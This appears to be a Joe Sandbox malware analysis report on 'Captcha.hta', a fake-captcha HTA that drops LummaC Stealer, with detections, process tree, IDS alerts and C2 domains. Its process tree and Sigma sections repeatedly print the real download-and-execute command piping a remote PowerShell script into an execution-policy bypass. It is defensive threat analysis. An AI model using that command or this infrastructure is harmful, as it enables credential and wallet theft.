Edit tour

Windows Analysis Report
Captcha.hta

Overview

General Information

Sample name:	Captcha.hta
Analysis ID:	1578704
MD5:	c8f045b16d3106cf269965b7fa2485dd
SHA1:	c3e7306fe8290c38b656a6a671e5e889c37f63a5
SHA256:	26eb8e2490888484e79cdd25b87257e5994a3ff084f0f9e54478f843a639c4e3
Tags:	htauser-lontze7
Infos:

Detection

LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected Cobalt Strike Beacon

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected HtmlPhish44

Yara detected LummaC Stealer

Yara detected obfuscated html page

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Compiles code for process injection (via .Net compiler)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Suspicious MSHTA Child Process

Suspicious command line found

Suspicious execution chain found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 1516 cmdline: mshta.exe "C:\Users\user\Desktop\Captcha.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 6812 cmdline: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 4008 cmdline: curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

powershell.exe (PID: 7100 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 7376 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 7416 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1090.tmp" "c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

RegAsm.exe (PID: 7432 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["necklacebudi.lat", "rapeflowwj.lat", "sustainskelet.lat", "aspecteirs.lat", "energyaffai.lat", "grannyejh.lat", "discokeyus.lat", "crosshuaht.lat"], "Build id": "DUkgLv--tax"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Captcha.hta	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security
Captcha.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 7100	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 7100	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1c734:$b2: ::FromBase64String( 0x1c760:$b2: ::FromBase64String( 0x1c78c:$b2: ::FromBase64String( 0x1defd:$b2: ::FromBase64String( 0x324d3:$s1: -join 0x9aaa3:$s1: -join 0xa7b78:$s1: -join 0xaaf4a:$s1: -join 0xab5fc:$s1: -join 0xad0ed:$s1: -join 0xaf2f3:$s1: -join 0xafb1a:$s1: -join 0xb038a:$s1: -join 0xb0ac5:$s1: -join 0xb0af7:$s1: -join 0xb0b3f:$s1: -join 0xb0b5e:$s1: -join 0xb13ae:$s1: -join 0xb152a:$s1: -join 0xb15a2:$s1: -join 0xb1635:$s1: -join
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 1516, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 6812, ProcessName: cmd.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 7100, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", ProcessId: 7376, ProcessName: csc.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 1516, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 6812, ProcessName: cmd.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7100, TargetFilename: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6812, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ProcessId: 7100, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline", ProcessId: 7376, ProcessName: csc.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T07:18:05.860092+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	172.67.197.170	443	TCP
2024-12-20T07:18:07.813883+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	172.67.197.170	443	TCP
2024-12-20T07:18:10.149526+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	172.67.197.170	443	TCP
2024-12-20T07:18:12.632007+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	172.67.197.170	443	TCP
2024-12-20T07:18:14.764171+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	172.67.197.170	443	TCP
2024-12-20T07:18:17.038616+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	172.67.197.170	443	TCP
2024-12-20T07:18:19.432679+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	172.67.197.170	443	TCP
2024-12-20T07:18:23.912824+0100	2028371	3	Unknown Traffic	192.168.2.4	49750	172.67.197.170	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T07:18:06.583127+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	172.67.197.170	443	TCP
2024-12-20T07:18:08.586491+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	172.67.197.170	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T07:18:06.583127+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49736	172.67.197.170	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T07:18:08.586491+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49738	172.67.197.170	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T07:18:05.860092+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	172.67.197.170	443	TCP
2024-12-20T07:18:07.813883+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	172.67.197.170	443	TCP
2024-12-20T07:18:10.149526+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	49739	172.67.197.170	443	TCP
2024-12-20T07:18:12.632007+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	49740	172.67.197.170	443	TCP
2024-12-20T07:18:14.764171+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	172.67.197.170	443	TCP
2024-12-20T07:18:17.038616+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	49743	172.67.197.170	443	TCP
2024-12-20T07:18:19.432679+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	49745	172.67.197.170	443	TCP
2024-12-20T07:18:23.912824+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	49750	172.67.197.170	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T07:18:04.143228+0100	2058360	1	Domain Observed Used for C2 Detected	192.168.2.4	65307	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T07:18:03.910798+0100	2058364	1	Domain Observed Used for C2 Detected	192.168.2.4	60815	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T07:18:17.801318+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49743	172.67.197.170	443	TCP

ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T07:18:01.761536+0100	2859377	1	A Network Trojan was detected	192.168.2.4	49733	147.45.44.131	80	TCP
2024-12-20T07:18:02.605097+0100	2859377	1	A Network Trojan was detected	192.168.2.4	49733	147.45.44.131	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

Found malware configuration

Source: 5.2.powershell.exe.525556c.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "rapeflowwj.lat", "sustainskelet.lat", "aspecteirs.lat", "energyaffai.lat", "grannyejh.lat", "discokeyus.lat", "crosshuaht.lat"], "Build id": "DUkgLv--tax"}

Multi AV Scanner detection for submitted file

Source: Captcha.hta	Virustotal: Detection: 19%			Perma Link
Source: Captcha.hta	ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: DUkgLv--tax

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00415799 CryptUnprotectData,

8_2_00415799

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: Captcha.hta, type: SAMPLE

Yara detected obfuscated html page

Source: Yara match

File source: Captcha.hta, type: SAMPLE

Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.4:49745 version: TLS 1.2

Source:

Binary string: $^q7C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.pdb source: powershell.exe, 00000005.00000002.1737453939.0000000005224000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	8_2_00423860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [esi], al	8_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	8_2_0043ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	8_2_004096C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	8_2_004096C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	8_2_0043C767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	8_2_0040B70C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, eax	8_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	8_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	8_2_0042984F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, ecx	8_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	8_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	8_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then test eax, eax	8_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	8_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	8_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], bp	8_2_0041D83A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push C0BFD6CCh	8_2_00423086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push C0BFD6CCh	8_2_00423086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	8_2_0042B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	8_2_004179C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h	8_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, eax	8_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], dx	8_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	8_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, eax	8_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, eax	8_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, esi	8_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebx], cx	8_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	8_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042CA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	8_2_00416263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	8_2_00415220
